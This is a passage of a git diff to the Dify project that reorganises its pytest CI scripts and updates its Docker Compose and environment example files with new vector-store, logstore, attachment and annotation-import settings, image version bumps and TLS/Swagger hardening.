"${SKIP_MIDDLEWARE:-0}" != "1" ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env up -d db_postgres redis sandbox ssrf_proxy + STARTED_MIDDLEWARE=1 + # Give services a moment to come up + sleep 5 +fi + +cleanup() { + if [[ $STARTED_MIDDLEWARE -eq 1 ]]; then + docker compose -f docker/docker-compose.middleware.yaml --env-file docker/middleware.env down + fi + for f in "${EXPOSE_BACKUPS[@]}"; do + mv "$f.ci.bak" "$f" + done +} +trap cleanup EXIT + +pytest --timeout "${PYTEST_TIMEOUT}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests diff --git a/dev/pytest/pytest_model_runtime.sh b/dev/pytest/pytest_model_runtime.sh deleted file mode 100755 index fd68dbe697..0000000000 --- a/dev/pytest/pytest_model_runtime.sh +++ /dev/null @@ -1,18 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/model_runtime/anthropic \ - api/tests/integration_tests/model_runtime/azure_openai \ - api/tests/integration_tests/model_runtime/openai api/tests/integration_tests/model_runtime/chatglm \ - api/tests/integration_tests/model_runtime/google api/tests/integration_tests/model_runtime/xinference \ - api/tests/integration_tests/model_runtime/huggingface_hub/test_llm.py \ - api/tests/integration_tests/model_runtime/upstage \ - api/tests/integration_tests/model_runtime/fireworks \ - api/tests/integration_tests/model_runtime/nomic \ - api/tests/integration_tests/model_runtime/mixedbread \ - api/tests/integration_tests/model_runtime/voyage diff --git a/dev/pytest/pytest_testcontainers.sh b/dev/pytest/pytest_testcontainers.sh deleted file mode 100755 index f92f8821bf..0000000000 --- a/dev/pytest/pytest_testcontainers.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." 
- -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/test_containers_integration_tests diff --git a/dev/pytest/pytest_tools.sh b/dev/pytest/pytest_tools.sh deleted file mode 100755 index 989784f078..0000000000 --- a/dev/pytest/pytest_tools.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/tools diff --git a/dev/pytest/pytest_workflow.sh b/dev/pytest/pytest_workflow.sh deleted file mode 100755 index 941c8d3e7e..0000000000 --- a/dev/pytest/pytest_workflow.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/integration_tests/workflow diff --git a/dev/start-worker b/dev/start-worker index a01da11d86..7876620188 100755 --- a/dev/start-worker +++ b/dev/start-worker @@ -37,6 +37,7 @@ show_help() { echo " pipeline - Standard pipeline tasks" echo " triggered_workflow_dispatcher - Trigger dispatcher tasks" echo " trigger_refresh_executor - Trigger refresh tasks" + echo " retention - Retention tasks" } # Parse command line arguments @@ -105,10 +106,10 @@ if [[ -z "${QUEUES}" ]]; then # Configure queues based on edition if [[ "${EDITION}" == "CLOUD" ]]; then # Cloud edition: separate queues for dataset and trigger tasks - QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" else # Community edition (SELF_HOSTED): dataset and workflow have separate queues - QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" fi echo "No queues specified, using edition-based defaults: ${QUEUES}" diff --git a/docker/.env.example b/docker/.env.example index b71c38e07a..e5cdb64dae 100644 --- a/docker/.env.example +++ b/docker/.env.example @@ -518,7 +518,7 @@ SUPABASE_URL=your-server-url # ------------------------------ # The type of vector store to use. -# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`. 
+# Supported values are `weaviate`, `oceanbase`, `qdrant`, `milvus`, `myscale`, `relyt`, `pgvector`, `pgvecto-rs`, `chroma`, `opensearch`, `oracle`, `tencent`, `elasticsearch`, `elasticsearch-ja`, `analyticdb`, `couchbase`, `vikingdb`, `opengauss`, `tablestore`,`vastbase`,`tidb`,`tidb_on_qdrant`,`baidu`,`lindorm`,`huawei_cloud`,`upstash`, `matrixone`, `clickzetta`, `alibabacloud_mysql`, `iris`. VECTOR_STORE=weaviate # Prefix used to create collection name in vector database VECTOR_INDEX_NAME_PREFIX=Vector_index @@ -792,6 +792,21 @@ CLICKZETTA_ANALYZER_TYPE=chinese CLICKZETTA_ANALYZER_MODE=smart CLICKZETTA_VECTOR_DISTANCE_FUNCTION=cosine_distance +# InterSystems IRIS configuration, only available when VECTOR_STORE is `iris` +IRIS_HOST=iris +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en +IRIS_TIMEZONE=UTC + # ------------------------------ # Knowledge Configuration # ------------------------------ @@ -808,6 +823,19 @@ UPLOAD_FILE_BATCH_LIMIT=5 # Recommended: exe,bat,cmd,com,scr,vbs,ps1,msi,dll UPLOAD_FILE_EXTENSION_BLACKLIST= +# Maximum number of files allowed in a single chunk attachment, default 10. +SINGLE_CHUNK_ATTACHMENT_LIMIT=10 + +# Maximum number of files allowed in an image batch upload operation, default 10. +IMAGE_FILE_BATCH_LIMIT=10 + +# Maximum allowed image file size for attachments in megabytes, default 2. +ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2 + +# Timeout for downloading image attachments in seconds, default 60. +ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60 + + # ETL type, support: `dify`, `Unstructured` # `dify` Dify's proprietary file extraction scheme # `Unstructured` Unstructured.io file extraction scheme @@ -1016,6 +1044,25 @@ WORKFLOW_LOG_RETENTION_DAYS=30 # Batch size for workflow log cleanup operations (default: 100) WORKFLOW_LOG_CLEANUP_BATCH_SIZE=100 +# Aliyun SLS Logstore Configuration +# Aliyun Access Key ID +ALIYUN_SLS_ACCESS_KEY_ID= +# Aliyun Access Key Secret +ALIYUN_SLS_ACCESS_KEY_SECRET= +# Aliyun SLS Endpoint (e.g., cn-hangzhou.log.aliyuncs.com) +ALIYUN_SLS_ENDPOINT= +# Aliyun SLS Region (e.g., cn-hangzhou) +ALIYUN_SLS_REGION= +# Aliyun SLS Project Name +ALIYUN_SLS_PROJECT_NAME= +# Number of days to retain workflow run logs (default: 365 days, 3650 for permanent storage) +ALIYUN_SLS_LOGSTORE_TTL=365 +# Enable dual-write to both SLS LogStore and SQL database (default: false) +LOGSTORE_DUAL_WRITE_ENABLED=false +# Enable dual-read fallback to SQL database when LogStore returns no results (default: true) +# Useful for migration scenarios where historical data exists only in SQL database +LOGSTORE_DUAL_READ_ENABLED=true + # HTTP request node in workflow configuration HTTP_REQUEST_NODE_MAX_BINARY_SIZE=10485760 HTTP_REQUEST_NODE_MAX_TEXT_SIZE=1048576 @@ -1116,6 +1163,9 @@ WEAVIATE_AUTHENTICATION_APIKEY_USERS=hello@dify.ai WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED=true WEAVIATE_AUTHORIZATION_ADMINLIST_USERS=hello@dify.ai WEAVIATE_DISABLE_TELEMETRY=false +WEAVIATE_ENABLE_TOKENIZER_GSE=false +WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA=false +WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR=false # ------------------------------ # Environment Variables for Chroma # ------------------------------ @@ -1198,7 +1248,7 @@ NGINX_SSL_PORT=443 # and modify the env vars below accordingly.
NGINX_SSL_CERT_FILENAME=dify.crt NGINX_SSL_CERT_KEY_FILENAME=dify.key -NGINX_SSL_PROTOCOLS=TLSv1.1 TLSv1.2 TLSv1.3 +NGINX_SSL_PROTOCOLS=TLSv1.2 TLSv1.3 # Nginx performance tuning NGINX_WORKER_PROCESSES=auto @@ -1319,7 +1369,10 @@ PLUGIN_STDIO_BUFFER_SIZE=1024 PLUGIN_STDIO_MAX_BUFFER_SIZE=5242880 PLUGIN_PYTHON_ENV_INIT_TIMEOUT=120 +# Plugin Daemon side timeout (configure to match the API side below) PLUGIN_MAX_EXECUTION_TIMEOUT=600 +# API side timeout (configure to match the Plugin Daemon side above) +PLUGIN_DAEMON_TIMEOUT=600.0 # PIP_MIRROR_URL=https://pypi.tuna.tsinghua.edu.cn/simple PIP_MIRROR_URL= @@ -1390,7 +1443,7 @@ QUEUE_MONITOR_ALERT_EMAILS= QUEUE_MONITOR_INTERVAL=30 # Swagger UI configuration -SWAGGER_UI_ENABLED=true +SWAGGER_UI_ENABLED=false SWAGGER_UI_PATH=/swagger-ui.html # Whether to encrypt dataset IDs when exporting DSL files (default: true) @@ -1415,4 +1468,23 @@ WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE=100 WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK=0 # Tenant isolated task queue configuration -TENANT_ISOLATED_TASK_CONCURRENCY=1 \ No newline at end of file +TENANT_ISOLATED_TASK_CONCURRENCY=1 + +# Maximum allowed CSV file size for annotation import in megabytes +ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2 +# Maximum number of annotation records allowed in a single import +ANNOTATION_IMPORT_MAX_RECORDS=10000 +# Minimum number of annotation records required in a single import +ANNOTATION_IMPORT_MIN_RECORDS=1 +ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5 +ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20 +# Maximum number of concurrent annotation import tasks per tenant +ANNOTATION_IMPORT_MAX_CONCURRENT=5 + +# The API key for Amplitude +AMPLITUDE_API_KEY= + +# Sandbox expired records cleanup configuration +SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD=21 +SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE=1000 +SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS=30 diff --git a/docker/docker-compose-template.yaml b/docker/docker-compose-template.yaml index 69bcd9dff8..a07ed9e8ad 100644 --- a/docker/docker-compose-template.yaml +++ b/docker/docker-compose-template.yaml @@ -1,8 +1,27 @@ x-shared-env: &shared-api-worker-env services: + # Init container to fix permissions + init_permissions: + image: busybox:latest + command: + - sh + - -c + - | + FLAG_FILE="/app/api/storage/.init_permissions" + if [ -f "$${FLAG_FILE}" ]; then + echo "Permissions already initialized. Exiting." + exit 0 + fi + echo "Initializing permissions for /app/api/storage" + chown -R 1001:1001 /app/api/storage && touch "$${FLAG_FILE}" + echo "Permissions initialized. Exiting." + volumes: + - ./volumes/app/storage:/app/api/storage + restart: "no" + # API service api: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -15,8 +34,11 @@ services: PLUGIN_REMOTE_INSTALL_HOST: ${EXPOSE_PLUGIN_DEBUGGING_HOST:-localhost} PLUGIN_REMOTE_INSTALL_PORT: ${EXPOSE_PLUGIN_DEBUGGING_PORT:-5003} PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -41,7 +63,7 @@ services: # worker service # The Celery worker for processing all queues (dataset, workflow, mail, etc.)
worker: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -54,6 +76,8 @@ services: PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -78,7 +102,7 @@ services: # worker_beat service # Celery beat for scheduling periodic tasks. worker_beat: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -86,6 +110,8 @@ services: # Startup mode, 'worker_beat' starts the Celery beat for scheduling periodic tasks. MODE: beat depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -106,11 +132,12 @@ services: # Frontend web application. web: - image: langgenius/dify-web:1.10.1-fix.1 + image: langgenius/dify-web:1.11.1 restart: always environment: CONSOLE_API_URL: ${CONSOLE_API_URL:-} APP_API_URL: ${APP_API_URL:-} + AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} NEXT_PUBLIC_COOKIE_DOMAIN: ${NEXT_PUBLIC_COOKIE_DOMAIN:-} SENTRY_DSN: ${WEB_SENTRY_DSN:-} NEXT_TELEMETRY_DISABLED: ${NEXT_TELEMETRY_DISABLED:-0} @@ -243,7 +270,7 @@ services: # plugin daemon plugin_daemon: - image: langgenius/dify-plugin-daemon:0.4.1-local + image: langgenius/dify-plugin-daemon:0.5.1-local restart: always environment: # Use the shared environment variables. @@ -388,7 +415,7 @@ services: # and modify the env vars below in .env if HTTPS_ENABLED is true. NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -426,6 +453,9 @@ services: AUTHORIZATION_ADMINLIST_ENABLED: ${WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED:-true} AUTHORIZATION_ADMINLIST_USERS: ${WEAVIATE_AUTHORIZATION_ADMINLIST_USERS:-hello@dify.ai} DISABLE_TELEMETRY: ${WEAVIATE_DISABLE_TELEMETRY:-false} + ENABLE_TOKENIZER_GSE: ${WEAVIATE_ENABLE_TOKENIZER_GSE:-false} + ENABLE_TOKENIZER_KAGOME_JA: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA:-false} + ENABLE_TOKENIZER_KAGOME_KR: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR:-false} # OceanBase vector database oceanbase: @@ -619,6 +649,26 @@ services: CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} + # InterSystems IRIS vector database + iris: + image: containers.intersystems.com/intersystems/iris-community:2025.3 + profiles: + - iris + container_name: iris + restart: always + init: true + ports: + - "${IRIS_SUPER_SERVER_PORT:-1972}:1972" + - "${IRIS_WEB_SERVER_PORT:-52773}:52773" + volumes: + - ./volumes/iris:/opt/iris + - ./iris/iris-init.script:/iris-init.script + - ./iris/docker-entrypoint.sh:/custom-entrypoint.sh + entrypoint: ["/custom-entrypoint.sh"] + tty: true + environment: + TZ: ${IRIS_TIMEZONE:-UTC} + # Oracle vector database oracle: image: container-registry.oracle.com/database/free:latest diff --git 
a/docker/docker-compose.middleware.yaml b/docker/docker-compose.middleware.yaml index 3a06fa16c0..ed35bc2652 100644 --- a/docker/docker-compose.middleware.yaml +++ b/docker/docker-compose.middleware.yaml @@ -123,7 +123,7 @@ services: # plugin daemon plugin_daemon: - image: langgenius/dify-plugin-daemon:0.4.1-local + image: langgenius/dify-plugin-daemon:0.5.1-local restart: always env_file: - ./middleware.env diff --git a/docker/docker-compose.yaml b/docker/docker-compose.yaml index 407d240eeb..24e1077ebe 100644 --- a/docker/docker-compose.yaml +++ b/docker/docker-compose.yaml @@ -361,9 +361,26 @@ x-shared-env: &shared-api-worker-env CLICKZETTA_ANALYZER_TYPE: ${CLICKZETTA_ANALYZER_TYPE:-chinese} CLICKZETTA_ANALYZER_MODE: ${CLICKZETTA_ANALYZER_MODE:-smart} CLICKZETTA_VECTOR_DISTANCE_FUNCTION: ${CLICKZETTA_VECTOR_DISTANCE_FUNCTION:-cosine_distance} + IRIS_HOST: ${IRIS_HOST:-iris} + IRIS_SUPER_SERVER_PORT: ${IRIS_SUPER_SERVER_PORT:-1972} + IRIS_WEB_SERVER_PORT: ${IRIS_WEB_SERVER_PORT:-52773} + IRIS_USER: ${IRIS_USER:-_SYSTEM} + IRIS_PASSWORD: ${IRIS_PASSWORD:-Dify@1234} + IRIS_DATABASE: ${IRIS_DATABASE:-USER} + IRIS_SCHEMA: ${IRIS_SCHEMA:-dify} + IRIS_CONNECTION_URL: ${IRIS_CONNECTION_URL:-} + IRIS_MIN_CONNECTION: ${IRIS_MIN_CONNECTION:-1} + IRIS_MAX_CONNECTION: ${IRIS_MAX_CONNECTION:-3} + IRIS_TEXT_INDEX: ${IRIS_TEXT_INDEX:-true} + IRIS_TEXT_INDEX_LANGUAGE: ${IRIS_TEXT_INDEX_LANGUAGE:-en} + IRIS_TIMEZONE: ${IRIS_TIMEZONE:-UTC} UPLOAD_FILE_SIZE_LIMIT: ${UPLOAD_FILE_SIZE_LIMIT:-15} UPLOAD_FILE_BATCH_LIMIT: ${UPLOAD_FILE_BATCH_LIMIT:-5} UPLOAD_FILE_EXTENSION_BLACKLIST: ${UPLOAD_FILE_EXTENSION_BLACKLIST:-} + SINGLE_CHUNK_ATTACHMENT_LIMIT: ${SINGLE_CHUNK_ATTACHMENT_LIMIT:-10} + IMAGE_FILE_BATCH_LIMIT: ${IMAGE_FILE_BATCH_LIMIT:-10} + ATTACHMENT_IMAGE_FILE_SIZE_LIMIT: ${ATTACHMENT_IMAGE_FILE_SIZE_LIMIT:-2} + ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT: ${ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT:-60} ETL_TYPE: ${ETL_TYPE:-dify} UNSTRUCTURED_API_URL: ${UNSTRUCTURED_API_URL:-} UNSTRUCTURED_API_KEY: ${UNSTRUCTURED_API_KEY:-} @@ -438,6 +455,14 @@ x-shared-env: &shared-api-worker-env WORKFLOW_LOG_CLEANUP_ENABLED: ${WORKFLOW_LOG_CLEANUP_ENABLED:-false} WORKFLOW_LOG_RETENTION_DAYS: ${WORKFLOW_LOG_RETENTION_DAYS:-30} WORKFLOW_LOG_CLEANUP_BATCH_SIZE: ${WORKFLOW_LOG_CLEANUP_BATCH_SIZE:-100} + ALIYUN_SLS_ACCESS_KEY_ID: ${ALIYUN_SLS_ACCESS_KEY_ID:-} + ALIYUN_SLS_ACCESS_KEY_SECRET: ${ALIYUN_SLS_ACCESS_KEY_SECRET:-} + ALIYUN_SLS_ENDPOINT: ${ALIYUN_SLS_ENDPOINT:-} + ALIYUN_SLS_REGION: ${ALIYUN_SLS_REGION:-} + ALIYUN_SLS_PROJECT_NAME: ${ALIYUN_SLS_PROJECT_NAME:-} + ALIYUN_SLS_LOGSTORE_TTL: ${ALIYUN_SLS_LOGSTORE_TTL:-365} + LOGSTORE_DUAL_WRITE_ENABLED: ${LOGSTORE_DUAL_WRITE_ENABLED:-false} + LOGSTORE_DUAL_READ_ENABLED: ${LOGSTORE_DUAL_READ_ENABLED:-true} HTTP_REQUEST_NODE_MAX_BINARY_SIZE: ${HTTP_REQUEST_NODE_MAX_BINARY_SIZE:-10485760} HTTP_REQUEST_NODE_MAX_TEXT_SIZE: ${HTTP_REQUEST_NODE_MAX_TEXT_SIZE:-1048576} HTTP_REQUEST_NODE_SSL_VERIFY: ${HTTP_REQUEST_NODE_SSL_VERIFY:-True} @@ -475,6 +500,9 @@ x-shared-env: &shared-api-worker-env WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED: ${WEAVIATE_AUTHORIZATION_ADMINLIST_ENABLED:-true} WEAVIATE_AUTHORIZATION_ADMINLIST_USERS: ${WEAVIATE_AUTHORIZATION_ADMINLIST_USERS:-hello@dify.ai} WEAVIATE_DISABLE_TELEMETRY: ${WEAVIATE_DISABLE_TELEMETRY:-false} + WEAVIATE_ENABLE_TOKENIZER_GSE: ${WEAVIATE_ENABLE_TOKENIZER_GSE:-false} + WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_JA:-false} + WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR: ${WEAVIATE_ENABLE_TOKENIZER_KAGOME_KR:-false} 
CHROMA_SERVER_AUTHN_CREDENTIALS: ${CHROMA_SERVER_AUTHN_CREDENTIALS:-difyai123456} CHROMA_SERVER_AUTHN_PROVIDER: ${CHROMA_SERVER_AUTHN_PROVIDER:-chromadb.auth.token_authn.TokenAuthenticationServerProvider} CHROMA_IS_PERSISTENT: ${CHROMA_IS_PERSISTENT:-TRUE} @@ -508,7 +536,7 @@ x-shared-env: &shared-api-worker-env NGINX_SSL_PORT: ${NGINX_SSL_PORT:-443} NGINX_SSL_CERT_FILENAME: ${NGINX_SSL_CERT_FILENAME:-dify.crt} NGINX_SSL_CERT_KEY_FILENAME: ${NGINX_SSL_CERT_KEY_FILENAME:-dify.key} - NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.1 TLSv1.2 TLSv1.3} + NGINX_SSL_PROTOCOLS: ${NGINX_SSL_PROTOCOLS:-TLSv1.2 TLSv1.3} NGINX_WORKER_PROCESSES: ${NGINX_WORKER_PROCESSES:-auto} NGINX_CLIENT_MAX_BODY_SIZE: ${NGINX_CLIENT_MAX_BODY_SIZE:-100M} NGINX_KEEPALIVE_TIMEOUT: ${NGINX_KEEPALIVE_TIMEOUT:-65} @@ -563,6 +591,7 @@ x-shared-env: &shared-api-worker-env PLUGIN_STDIO_MAX_BUFFER_SIZE: ${PLUGIN_STDIO_MAX_BUFFER_SIZE:-5242880} PLUGIN_PYTHON_ENV_INIT_TIMEOUT: ${PLUGIN_PYTHON_ENV_INIT_TIMEOUT:-120} PLUGIN_MAX_EXECUTION_TIMEOUT: ${PLUGIN_MAX_EXECUTION_TIMEOUT:-600} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} PIP_MIRROR_URL: ${PIP_MIRROR_URL:-} PLUGIN_STORAGE_TYPE: ${PLUGIN_STORAGE_TYPE:-local} PLUGIN_STORAGE_LOCAL_ROOT: ${PLUGIN_STORAGE_LOCAL_ROOT:-/app/storage} @@ -611,7 +640,7 @@ x-shared-env: &shared-api-worker-env QUEUE_MONITOR_THRESHOLD: ${QUEUE_MONITOR_THRESHOLD:-200} QUEUE_MONITOR_ALERT_EMAILS: ${QUEUE_MONITOR_ALERT_EMAILS:-} QUEUE_MONITOR_INTERVAL: ${QUEUE_MONITOR_INTERVAL:-30} - SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-true} + SWAGGER_UI_ENABLED: ${SWAGGER_UI_ENABLED:-false} SWAGGER_UI_PATH: ${SWAGGER_UI_PATH:-/swagger-ui.html} DSL_EXPORT_ENCRYPT_DATASET_ID: ${DSL_EXPORT_ENCRYPT_DATASET_ID:-true} DATASET_MAX_SEGMENTS_PER_REQUEST: ${DATASET_MAX_SEGMENTS_PER_REQUEST:-0} @@ -628,11 +657,40 @@ x-shared-env: &shared-api-worker-env WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE: ${WORKFLOW_SCHEDULE_POLLER_BATCH_SIZE:-100} WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK: ${WORKFLOW_SCHEDULE_MAX_DISPATCH_PER_TICK:-0} TENANT_ISOLATED_TASK_CONCURRENCY: ${TENANT_ISOLATED_TASK_CONCURRENCY:-1} + ANNOTATION_IMPORT_FILE_SIZE_LIMIT: ${ANNOTATION_IMPORT_FILE_SIZE_LIMIT:-2} + ANNOTATION_IMPORT_MAX_RECORDS: ${ANNOTATION_IMPORT_MAX_RECORDS:-10000} + ANNOTATION_IMPORT_MIN_RECORDS: ${ANNOTATION_IMPORT_MIN_RECORDS:-1} + ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE:-5} + ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: ${ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR:-20} + ANNOTATION_IMPORT_MAX_CONCURRENT: ${ANNOTATION_IMPORT_MAX_CONCURRENT:-5} + AMPLITUDE_API_KEY: ${AMPLITUDE_API_KEY:-} + SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD: ${SANDBOX_EXPIRED_RECORDS_CLEAN_GRACEFUL_PERIOD:-21} + SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE: ${SANDBOX_EXPIRED_RECORDS_CLEAN_BATCH_SIZE:-1000} + SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS: ${SANDBOX_EXPIRED_RECORDS_RETENTION_DAYS:-30} services: + # Init container to fix permissions + init_permissions: + image: busybox:latest + command: + - sh + - -c + - | + FLAG_FILE="/app/api/storage/.init_permissions" + if [ -f "$${FLAG_FILE}" ]; then + echo "Permissions already initialized. Exiting." + exit 0 + fi + echo "Initializing permissions for /app/api/storage" + chown -R 1001:1001 /app/api/storage && touch "$${FLAG_FILE}" + echo "Permissions initialized. Exiting." 
+ volumes: + - ./volumes/app/storage:/app/api/storage + restart: "no" + # API service api: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -645,8 +703,11 @@ services: PLUGIN_REMOTE_INSTALL_HOST: ${EXPOSE_PLUGIN_DEBUGGING_HOST:-localhost} PLUGIN_REMOTE_INSTALL_PORT: ${EXPOSE_PLUGIN_DEBUGGING_PORT:-5003} PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} + PLUGIN_DAEMON_TIMEOUT: ${PLUGIN_DAEMON_TIMEOUT:-600.0} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -671,7 +732,7 @@ services: # worker service # The Celery worker for processing all queues (dataset, workflow, mail, etc.) worker: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -684,6 +745,8 @@ services: PLUGIN_MAX_PACKAGE_SIZE: ${PLUGIN_MAX_PACKAGE_SIZE:-52428800} INNER_API_KEY_FOR_PLUGIN: ${PLUGIN_DIFY_INNER_API_KEY:-QaHbTe77CtuXmsfyhR7+vRjI/+XbV1AaFy691iy+kGDv2Jvy0/eAh8Y1} depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ -708,7 +771,7 @@ services: # worker_beat service # Celery beat for scheduling periodic tasks. worker_beat: - image: langgenius/dify-api:1.10.1-fix.1 + image: langgenius/dify-api:1.11.1 restart: always environment: # Use the shared environment variables. @@ -716,6 +779,8 @@ services: # Startup mode, 'worker_beat' starts the Celery beat for scheduling periodic tasks. MODE: beat depends_on: + init_permissions: + condition: service_completed_successfully db_postgres: condition: service_healthy required: false @@ 